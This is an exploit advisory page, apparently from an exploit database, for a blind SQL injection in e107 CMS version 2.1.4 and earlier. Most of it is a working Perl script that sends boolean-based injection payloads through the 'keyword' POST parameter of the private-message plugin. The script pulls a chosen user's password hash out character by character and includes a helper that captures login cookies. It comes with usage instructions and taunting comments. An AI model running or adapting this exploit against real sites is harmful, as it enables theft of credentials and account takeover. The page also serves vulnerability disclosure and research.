e107 2.1.4 Blind SQL Injection

2017.03.12
Credit: staker
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/perl # # # e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit # # -------------------------------------------------------------------------- # [*] Discovered by staker - staker[at]hotmail[dot]it # [*] Discovered on 09/03/2017 # [*] Site Vendor: http://www.e107.org # [*] BUG: Blind SQL Injection # -------------------------------------------------------------------------- # # # Description # ------------------------------------------------------------------------- # e107 contains one flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the "e107_plugins/pm/pm.php" script # not properly saniting user-supplied input to the "keyword" POST variable # This may allow an attacker to inject or manipulate sql queries in # the backend database regardless of php.ini settings # ------------------------------------------------------------------------- # SHORT EXPLANATION # ----------------------------------- # # FILE: "e107_handlers/core_functions.php" # # 76. function vartrue(&$val, $default='') # 77. { # 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database # 79. return $default; # 80.} # # ---------------------------------- # # FILE: "e107/e107_plugins/pm/pm.php" # # # 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function. # 36. { # 37. pm_user_lookup(); # 38.} # # # # 615. function pm_user_lookup() # 616. { # 617. $sql = e107::getDb(); # 618. # 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized # 620. if($sql->gen($query)) # 621. { # 622. echo '['; # 623 while($row = $sql->fetch()) # 624. { # 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}"; # 626. } # 627. # 628. echo implode(",",$u); # 629. echo ']'; # ----------------------------------- # # # use your brain.. # # Greetz to: Warwolfz Crew, # meh, Dante90, SHADES MASTER and nexen # # -- 0gay -- # # ----------------------------------- # YOUR MOM IS NOT SAFE ANYMORE!! # CALL HER!! # ----------------------------------- use strict; use IO::Socket::INET; use LWP::UserAgent; my ($URL,$uid) = @ARGV; my @chars = (8..122); my ($i,$ord,$hash) = (1,undef,undef); if (@ARGV != 2) { usage(); } $URL = parse::URL($URL); syswrite (STDOUT,"[-] Crypted Password: "); for ($i=0;$i<=60;$i++) { foreach $ord (@chars) { if (e107::Query(sql($i,$ord),$URL) == 666 ) { syswrite (STDOUT,chr($ord)); $hash .= chr($ord); last; } if ($i == 2 and not defined $hash) { syswrite (STDOUT,"\n[-] Exploit Failed"); exit; } } } if (length($hash) == 60) { die "\[-]Exploit Successfully"; } else { die "\n[-] Exploit Failed"; } sub e107::Query { # 1st parameter, sql query # 2nd parameter, e107 website my ($query,$URL) = @_; my $response = undef; my $lwp = new LWP::UserAgent; $lwp->default_header('User-Agent' => 'Lynx (textmode)'); $response = $lwp->post($URL."/pm/", [ keyword => $query ]) or die $!; if ($response->content =~ /caption/) { return 666; } else { return 0; } } sub parse::URL { my $string = shift @_ || die($!); if ($string !~ /^http:\/\/?/i) { $string = 'http://'.$string; } return $string; } sub sql { # 1st parameter, an e107's userid # 2nd parameter substring number # 3rd parameter charcode number my ($i,$j,$sql) = (shift,shift,undef); $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#"; return $sql; } sub e107::Cookies { my ($username,$password) = @_; my ($packet,$content); my $host = "127.0.0.1"; # Valid Host (insert it manually) my $path = "/e107/"; # Valid e107 path (insert it manually) my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In"; my $socket = new IO::Socket::INET( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ) or die $!; $packet .= "POST ".$path."/login.php HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: Lynx (textmode)\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length:".length($data)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet.= $data; $socket->send($packet); while (<$socket>) { $content .= $_; } if ($content =~ /Set-Cookie: (.+?)/) { return $1; } else { die("[-] Login Failed..\n"); } # This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit. # it works without log-in, but if you got some trouble, try to use this one. # e107::Login('YOUR USERNAME','YOUR PASSWORD'); } sub usage() { print "[*---------------------------------------------------------*]\n". "[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n". "[*---------------------------------------------------------*]\n". "[* Usage: perl web.pl [host] [uid] *]\n". "[* *]\n". "[* Options: *]\n". "[* [host] insert a valid host *]\n". "[* [uid] insert a userid *]\n". "[*---------------------------------------------------------*]\n"; exit; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top